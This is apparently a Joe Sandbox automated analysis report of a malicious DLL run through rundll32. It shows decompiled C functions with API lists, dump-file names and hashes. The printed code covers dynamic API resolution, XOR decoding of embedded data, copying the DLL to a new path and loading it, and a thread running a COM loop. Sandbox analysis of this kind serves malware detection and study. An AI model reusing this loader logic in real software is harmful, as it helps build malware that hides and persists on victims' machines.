                                                                                                                                                                                                                					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                                                					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                                                						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                                                					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                                                					if(_t58 == 0) {
                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                                                					if(_t59 == 0) {
                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					return _t59;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                0x10009716
                                                                                                                                                                                                                0x10009718
                                                                                                                                                                                                                0x1000971b
                                                                                                                                                                                                                0x1000971e
                                                                                                                                                                                                                0x10009724
                                                                                                                                                                                                                0x10009781
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10009781
                                                                                                                                                                                                                0x10009726
                                                                                                                                                                                                                0x10009731
                                                                                                                                                                                                                0x10009734
                                                                                                                                                                                                                0x10009739
                                                                                                                                                                                                                0x1000973e
                                                                                                                                                                                                                0x10009741
                                                                                                                                                                                                                0x10009743
                                                                                                                                                                                                                0x10009746
                                                                                                                                                                                                                0x10009749
                                                                                                                                                                                                                0x1000974e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10009750
                                                                                                                                                                                                                0x10009750
                                                                                                                                                                                                                0x10009762
                                                                                                                                                                                                                0x1000976f
                                                                                                                                                                                                                0x10009773
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10009775
                                                                                                                                                                                                                0x10009778
                                                                                                                                                                                                                0x10009779
                                                                                                                                                                                                                0x1000977f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000977f
                                                                                                                                                                                                                0x10009796
                                                                                                                                                                                                                0x1000979b
                                                                                                                                                                                                                0x1000979f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100097ab
                                                                                                                                                                                                                0x100097ab
                                                                                                                                                                                                                0x100097ad
                                                                                                                                                                                                                0x100097ad
                                                                                                                                                                                                                0x100097b3
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100097b9
                                                                                                                                                                                                                0x100097bd
                                                                                                                                                                                                                0x100097c1
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100097c1
                                                                                                                                                                                                                0x100097c7
                                                                                                                                                                                                                0x100097cf
                                                                                                                                                                                                                0x100097d4
                                                                                                                                                                                                                0x100097d7
                                                                                                                                                                                                                0x100097d7
                                                                                                                                                                                                                0x100097d9
                                                                                                                                                                                                                0x100097dd
                                                                                                                                                                                                                0x100097e5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100097e9
                                                                                                                                                                                                                0x100097f1
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100097f1

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(.dll,?,00000140,00000000), ref: 100097DD
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 100097E9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: .dll
                                                                                                                                                                                                                • API String ID: 2574300362-2738580789
                                                                                                                                                                                                                • Opcode ID: 53a7b4d00723407f0d789300976f2dd1b806011e9297163532ce598cbbef6b78
                                                                                                                                                                                                                • Instruction ID: d776720c0b4c11bf6a46d7560ebcee6aca48920ffc03f030aee782babc1786af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53a7b4d00723407f0d789300976f2dd1b806011e9297163532ce598cbbef6b78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2831E136E182559BEB54CFADC884AAEBBF5EF44384F244469D809E7249DB30DD42CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                			E1000169F(WCHAR* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                                				intOrPtr _t20;
                                                                                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                				char _t53;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t58 = __fp0;
                                                                                                                                                                                                                				_t48 = __edx;
                                                                                                                                                                                                                				E1000188E();
                                                                                                                                                                                                                				GetLocaleInfoA(1, 2,  &_v20, 4); // executed
                                                                                                                                                                                                                				_t18 = E1000B231(_t48, __fp0); // executed
                                                                                                                                                                                                                				 *0x10020d88 = _t18;
                                                                                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                                                                                					E10014C5F( *((intOrPtr*)(_t18 + 0x224)));
                                                                                                                                                                                                                					_t20 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                					_pop(_t43);
                                                                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t20 + 0x101c)) - 1;
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t20 + 0x101c)) != 1) {
                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                						__eflags =  *(_t20 + 0x1898) & 0x00010082;
                                                                                                                                                                                                                						if(( *(_t20 + 0x1898) & 0x00010082) != 0) {
                                                                                                                                                                                                                							L11:
                                                                                                                                                                                                                							 *((intOrPtr*)(_t20 + 0xa4)) = 1;
                                                                                                                                                                                                                							_t21 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t21 + 0x214)) - 3;
                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                								E10002E87();
                                                                                                                                                                                                                								L13:
                                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                                								return 0;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							E100014FA(_t48, __eflags, _t58);
                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t11 = _t20 + 0x224; // 0x10000000
                                                                                                                                                                                                                						_t48 =  *_t11;
                                                                                                                                                                                                                						_t25 = E1000A843( *_t11); // executed
                                                                                                                                                                                                                						__eflags = _t25;
                                                                                                                                                                                                                						_t20 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                						if(_t25 == 0) {
                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t20 + 0x214)) != 3) {
                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					__imp__CoInitializeEx(0, 6, __edi, __esi);
                                                                                                                                                                                                                					_t26 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0x1001db00);
                                                                                                                                                                                                                					_t27 = _t26 + 0x228;
                                                                                                                                                                                                                					__eflags = _t27;
                                                                                                                                                                                                                					_push(_t27);
                                                                                                                                                                                                                					_t50 = E10009DC8(0x1001db00);
                                                                                                                                                                                                                					_t53 = E100019A6(0x1001db00, 0x420);
                                                                                                                                                                                                                					_v8 = _t53;
                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                						_t46 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                						_t30 =  *0x10020d50; // 0x474fa80
                                                                                                                                                                                                                						_t32 =  *0x10020d6c; // 0x474fc60
                                                                                                                                                                                                                						_t33 =  *_t32( *((intOrPtr*)(_t30 + 0x54))(_t53, _t46 + 0x1644, _t50, 0, 0));
                                                                                                                                                                                                                						__eflags = _t33 - 5;
                                                                                                                                                                                                                						if(_t33 != 5) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						Sleep(0x7d0);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					E1000A291( &_v8);
                                                                                                                                                                                                                					_t36 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_pop(_t43);
                                                                                                                                                                                                                					 *((intOrPtr*)(_t36 + 0xec))(0);
                                                                                                                                                                                                                					_t20 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return 1;
                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                0x1000169f
                                                                                                                                                                                                                0x1000169f
                                                                                                                                                                                                                0x100016a6
                                                                                                                                                                                                                0x100016b7
                                                                                                                                                                                                                0x100016be
                                                                                                                                                                                                                0x100016c3
                                                                                                                                                                                                                0x100016cb
                                                                                                                                                                                                                0x100016da
                                                                                                                                                                                                                0x100016df
                                                                                                                                                                                                                0x100016e4
                                                                                                                                                                                                                0x100016e5
                                                                                                                                                                                                                0x100016eb
                                                                                                                                                                                                                0x1000177d
                                                                                                                                                                                                                0x1000177d
                                                                                                                                                                                                                0x10001787
                                                                                                                                                                                                                0x100017af
                                                                                                                                                                                                                0x100017af
                                                                                                                                                                                                                0x100017b5
                                                                                                                                                                                                                0x100017ba
                                                                                                                                                                                                                0x100017c1
                                                                                                                                                                                                                0x100017a8
                                                                                                                                                                                                                0x100017a8
                                                                                                                                                                                                                0x100017c8
                                                                                                                                                                                                                0x100017c8
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100017c8
                                                                                                                                                                                                                0x100017c3
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100017c3
                                                                                                                                                                                                                0x10001789
                                                                                                                                                                                                                0x10001789
                                                                                                                                                                                                                0x10001790
                                                                                                                                                                                                                0x10001795
                                                                                                                                                                                                                0x10001797
                                                                                                                                                                                                                0x1000179d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000179f
                                                                                                                                                                                                                0x100017a6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100017a6
                                                                                                                                                                                                                0x100016f7
                                                                                                                                                                                                                0x100016fd
                                                                                                                                                                                                                0x10001707
                                                                                                                                                                                                                0x10001709
                                                                                                                                                                                                                0x1000170a
                                                                                                                                                                                                                0x1000170a
                                                                                                                                                                                                                0x1000170f
                                                                                                                                                                                                                0x1000171b
                                                                                                                                                                                                                0x10001722
                                                                                                                                                                                                                0x10001727
                                                                                                                                                                                                                0x1000172a
                                                                                                                                                                                                                0x1000172a
                                                                                                                                                                                                                0x10001730
                                                                                                                                                                                                                0x10001746
                                                                                                                                                                                                                0x1000174b
                                                                                                                                                                                                                0x1000174d
                                                                                                                                                                                                                0x10001750
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10001757
                                                                                                                                                                                                                0x10001757
                                                                                                                                                                                                                0x10001763
                                                                                                                                                                                                                0x10001768
                                                                                                                                                                                                                0x1000176d
                                                                                                                                                                                                                0x10001770
                                                                                                                                                                                                                0x10001776
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000177c
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocaleInfoA.KERNELBASE(00000001,00000002,?,00000004), ref: 100016B7
                                                                                                                                                                                                                  • Part of subcall function 1000B231: GetCurrentProcessId.KERNEL32(?,?,00000001), ref: 1000B258
                                                                                                                                                                                                                  • Part of subcall function 1000B231: GetLastError.KERNEL32(?,?,00000001), ref: 1000B352
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000006), ref: 100016F7
                                                                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 10001757
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentErrorInfoInitializeLastLocaleProcessSleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1553610659-0
                                                                                                                                                                                                                • Opcode ID: a3b221c9c71cf84b0916dd40fa4d01affb539a29fbae8fe4750e20d2a455a4cc
                                                                                                                                                                                                                • Instruction ID: c7de880085743f48c4dc6eda8a205b57bb238f0f0f622972f11a8f00f1fd75af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3b221c9c71cf84b0916dd40fa4d01affb539a29fbae8fe4750e20d2a455a4cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7331F174640201AFF300EBA4CC8AFDA37F9EF45391F614079F5099B1A6DA74E8428B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                			_entry_(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                                				WCHAR* _t33;
                                                                                                                                                                                                                				long _t34;
                                                                                                                                                                                                                				WCHAR* _t38;
                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t49;
                                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t50;
                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                				if(_a8 != 1) {
                                                                                                                                                                                                                					if(_a8 != 0) {
                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						_t24 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						 *((intOrPtr*)(_t24 + 0xbc))(0xaa);
                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					E10009510();
                                                                                                                                                                                                                					E100098FF();
                                                                                                                                                                                                                					 *0x10020d60 = _a4;
                                                                                                                                                                                                                					 *0x10020d5c = 1;
                                                                                                                                                                                                                					E10014D5F(_a4);
                                                                                                                                                                                                                					_a4 =  *[fs:0x30];
                                                                                                                                                                                                                					if(_a4[1] != 0) {
                                                                                                                                                                                                                						_t49 = 0;
                                                                                                                                                                                                                						_t65 = 0x80;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							 *(_t49 + 0x1001f6f0) =  *(_t49 + 0x1001f6f0) ^ 0x000000b7;
                                                                                                                                                                                                                							_t49 =  &(_t49->nLength);
                                                                                                                                                                                                                						} while (_t49 < _t65);
                                                                                                                                                                                                                						_t50 = 0;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							 *(_t50 + 0x1001f050) =  *(_t50 + 0x1001f050) ^ 0x000000b7;
                                                                                                                                                                                                                							_t50 =  &(_t50->nLength);
                                                                                                                                                                                                                						} while (_t50 < _t65);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					 *0x10020d58 = E100098AE(0x1001d948, 0x140, 0xb6);
                                                                                                                                                                                                                					 *_t71 = 0x7e7;
                                                                                                                                                                                                                					_t33 = E1000948D(0x1001d948);
                                                                                                                                                                                                                					_pop(_t59);
                                                                                                                                                                                                                					_a4 = _t33;
                                                                                                                                                                                                                					_t34 = GetFileAttributesW(_t33); // executed
                                                                                                                                                                                                                					_push( &_a4);
                                                                                                                                                                                                                					if(_t34 == 0xffffffff) {
                                                                                                                                                                                                                						E1000A291();
                                                                                                                                                                                                                						_t38 = E100094AD(E100019A6(_t59, 0xc1));
                                                                                                                                                                                                                						_a4 = _t38;
                                                                                                                                                                                                                						if(_t38 != 0) {
                                                                                                                                                                                                                							_t67 = 0x6c;
                                                                                                                                                                                                                							 *0x10020d50 = E100098AE(0x1001da90, _t67);
                                                                                                                                                                                                                							E100017CF(_t67);
                                                                                                                                                                                                                							E1000953B( &_a4, 0xfffffffe);
                                                                                                                                                                                                                							_t46 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                							 *((intOrPtr*)(_t46 + 0xec))(1, 0x60e);
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                						_t41 = CreateThread(0, 0, E1000169F, 0, 0,  &_v8);
                                                                                                                                                                                                                						 *0x10020d54 = _t41;
                                                                                                                                                                                                                						if(_t41 == 0) {
                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                							E100011EB(_a8);
                                                                                                                                                                                                                							_t23 = 1;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						E1000A291();
                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t23;
                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                0x100010a3
                                                                                                                                                                                                                0x100010ac
                                                                                                                                                                                                                0x100011d4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100011d6
                                                                                                                                                                                                                0x100011d6
                                                                                                                                                                                                                0x100011e0
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100011e0
                                                                                                                                                                                                                0x100010b2
                                                                                                                                                                                                                0x100010b2
                                                                                                                                                                                                                0x100010b7
                                                                                                                                                                                                                0x100010c0
                                                                                                                                                                                                                0x100010c5
                                                                                                                                                                                                                0x100010cb
                                                                                                                                                                                                                0x100010d7
                                                                                                                                                                                                                0x100010e3
                                                                                                                                                                                                                0x100010e5
                                                                                                                                                                                                                0x100010e7
                                                                                                                                                                                                                0x100010ea
                                                                                                                                                                                                                0x100010ea
                                                                                                                                                                                                                0x100010f1
                                                                                                                                                                                                                0x100010f2
                                                                                                                                                                                                                0x100010f6
                                                                                                                                                                                                                0x100010f8
                                                                                                                                                                                                                0x100010f8
                                                                                                                                                                                                                0x100010ff
                                                                                                                                                                                                                0x10001100
                                                                                                                                                                                                                0x100010f8
                                                                                                                                                                                                                0x10001118
                                                                                                                                                                                                                0x1000111d
                                                                                                                                                                                                                0x10001124
                                                                                                                                                                                                                0x10001129
                                                                                                                                                                                                                0x1000112b
                                                                                                                                                                                                                0x1000112e
                                                                                                                                                                                                                0x1000113a
                                                                                                                                                                                                                0x1000113b
                                                                                                                                                                                                                0x1000114a
                                                                                                                                                                                                                0x1000115d
                                                                                                                                                                                                                0x10001162
                                                                                                                                                                                                                0x10001167
                                                                                                                                                                                                                0x10001170
                                                                                                                                                                                                                0x1000117b
                                                                                                                                                                                                                0x10001180
                                                                                                                                                                                                                0x1000118b
                                                                                                                                                                                                                0x10001190
                                                                                                                                                                                                                0x10001199
                                                                                                                                                                                                                0x10001199
                                                                                                                                                                                                                0x100011a2
                                                                                                                                                                                                                0x100011b4
                                                                                                                                                                                                                0x100011b7
                                                                                                                                                                                                                0x100011be
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100011c0
                                                                                                                                                                                                                0x100011c0
                                                                                                                                                                                                                0x100011c3
                                                                                                                                                                                                                0x100011c8
                                                                                                                                                                                                                0x100011c8
                                                                                                                                                                                                                0x1000113d
                                                                                                                                                                                                                0x1000113d
                                                                                                                                                                                                                0x10001143
                                                                                                                                                                                                                0x10001143
                                                                                                                                                                                                                0x10001143
                                                                                                                                                                                                                0x1000113b
                                                                                                                                                                                                                0x100011cd

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 10009510: HeapCreate.KERNELBASE(00000000,00096000,00000000,100010B7), ref: 10009519
                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 1000112E
                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,1000169F,00000000,00000000,?), ref: 100011B4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$AttributesFileHeapThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 183707735-0
                                                                                                                                                                                                                • Opcode ID: b9a97e9ba8987b8b4a6afe3dfcbca0106fcc9cffada8fd1d1a9faea36bf9659a
                                                                                                                                                                                                                • Instruction ID: 4162b632d5d1cc40d92bf149abb497073d4d7b652b418d41a2fce86e5811987f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9a97e9ba8987b8b4a6afe3dfcbca0106fcc9cffada8fd1d1a9faea36bf9659a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A131D075604341ABF704DFA9DC85EDA3BE9EB853D0F208129F519CB2AADB34E581CB11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                                			E1000A2BD(void* __ecx, void* __edx) {
                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                                				char _v140;
                                                                                                                                                                                                                				char _t10;
                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                				WCHAR* _t29;
                                                                                                                                                                                                                				struct HINSTANCE__* _t32;
                                                                                                                                                                                                                				int _t40;
                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                				char _t52;
                                                                                                                                                                                                                				char* _t53;
                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                				WCHAR* _t56;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t40 = 0;
                                                                                                                                                                                                                				_t10 = E1000948D(__ecx, 0x815);
                                                                                                                                                                                                                				_t54 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_t52 = _t10;
                                                                                                                                                                                                                				_t55 = _t54 + 0xb0;
                                                                                                                                                                                                                				_v8 = _t52;
                                                                                                                                                                                                                				E1000B76A( &_v140, 0x40, L"%08x", E1000EEEC(_t55, E1000D389(_t54 + 0xb0), 0));
                                                                                                                                                                                                                				_t15 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_t3 = _t15 + 0xa8; // 0x1
                                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                                				_t20 = E1000948D(_t55, ( ~( *_t3) & 0x00000a5e) + 0x3e8);
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_push(_t52);
                                                                                                                                                                                                                				_t53 = "\\";
                                                                                                                                                                                                                				_push(_t53);
                                                                                                                                                                                                                				_push(_t20);
                                                                                                                                                                                                                				_t21 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_push(_t53);
                                                                                                                                                                                                                				_t56 = E10009DC8(_t21 + 0x1020);
                                                                                                                                                                                                                				_v12 = _t56;
                                                                                                                                                                                                                				E1000A291( &_v8);
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_push(L"dll");
                                                                                                                                                                                                                				_push(".");
                                                                                                                                                                                                                				_push( &_v140);
                                                                                                                                                                                                                				_t27 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_push(_t53);
                                                                                                                                                                                                                				_t29 = E10009DC8(_t27 + 0x122a);
                                                                                                                                                                                                                				 *0x10020e74 = _t29;
                                                                                                                                                                                                                				CopyFileW(_t56, _t29, 0);
                                                                                                                                                                                                                				_t32 = LoadLibraryW( *0x10020e74); // executed
                                                                                                                                                                                                                				 *0x10020e6c = _t32;
                                                                                                                                                                                                                				if(_t32 != 0) {
                                                                                                                                                                                                                					_push(_t32);
                                                                                                                                                                                                                					_t51 = 0x30;
                                                                                                                                                                                                                					_t40 = E10009863(0x1001db08, _t51);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				E1000953B( &_v12, 0xfffffffe);
                                                                                                                                                                                                                				E100096BF( &_v140, 0, 0x80);
                                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                                					E1000953B(0x10020e74, 0xfffffffe);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t40;
                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                0x1000a2ce
                                                                                                                                                                                                                0x1000a2d0
                                                                                                                                                                                                                0x1000a2d5
                                                                                                                                                                                                                0x1000a2db
                                                                                                                                                                                                                0x1000a2de
                                                                                                                                                                                                                0x1000a2e4
                                                                                                                                                                                                                0x1000a307
                                                                                                                                                                                                                0x1000a30c
                                                                                                                                                                                                                0x1000a311
                                                                                                                                                                                                                0x1000a319
                                                                                                                                                                                                                0x1000a326
                                                                                                                                                                                                                0x1000a32b
                                                                                                                                                                                                                0x1000a32c
                                                                                                                                                                                                                0x1000a32d
                                                                                                                                                                                                                0x1000a332
                                                                                                                                                                                                                0x1000a333
                                                                                                                                                                                                                0x1000a334
                                                                                                                                                                                                                0x1000a33e
                                                                                                                                                                                                                0x1000a345
                                                                                                                                                                                                                0x1000a34b
                                                                                                                                                                                                                0x1000a34e
                                                                                                                                                                                                                0x1000a353
                                                                                                                                                                                                                0x1000a354
                                                                                                                                                                                                                0x1000a359
                                                                                                                                                                                                                0x1000a364
                                                                                                                                                                                                                0x1000a365
                                                                                                                                                                                                                0x1000a36f
                                                                                                                                                                                                                0x1000a371
                                                                                                                                                                                                                0x1000a379
                                                                                                                                                                                                                0x1000a386
                                                                                                                                                                                                                0x1000a392
                                                                                                                                                                                                                0x1000a398
                                                                                                                                                                                                                0x1000a39f
                                                                                                                                                                                                                0x1000a3a1
                                                                                                                                                                                                                0x1000a3a4
                                                                                                                                                                                                                0x1000a3b0
